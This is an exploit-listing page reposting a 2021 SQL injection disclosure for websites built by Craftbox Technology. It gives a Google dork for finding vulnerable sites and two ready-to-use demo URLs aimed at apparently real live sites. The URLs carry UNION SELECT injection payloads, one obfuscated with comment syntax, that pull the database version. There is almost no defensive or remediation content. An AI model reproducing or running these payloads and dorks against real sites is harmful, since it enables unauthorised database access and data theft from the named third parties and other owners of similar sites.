Advertisement






Craftbox Technology - Sql Injection Vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-09-10
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090070

Below is a copy:

Craftbox Technology - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Craftbox Technology -  Sql Injection Vulnerability
#Date: 2021-09-10
#Exploit Author: Behrouz Mansoori
#Google Dork: "by Craftbox Technology"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "by Craftbox Technology"


### Demo :

http://www.vparmar.in/project-details.php?cid=1&pid=6%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18--+

http://gurudwaradukhniwaransahib.org/index_news.php?id=-2%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.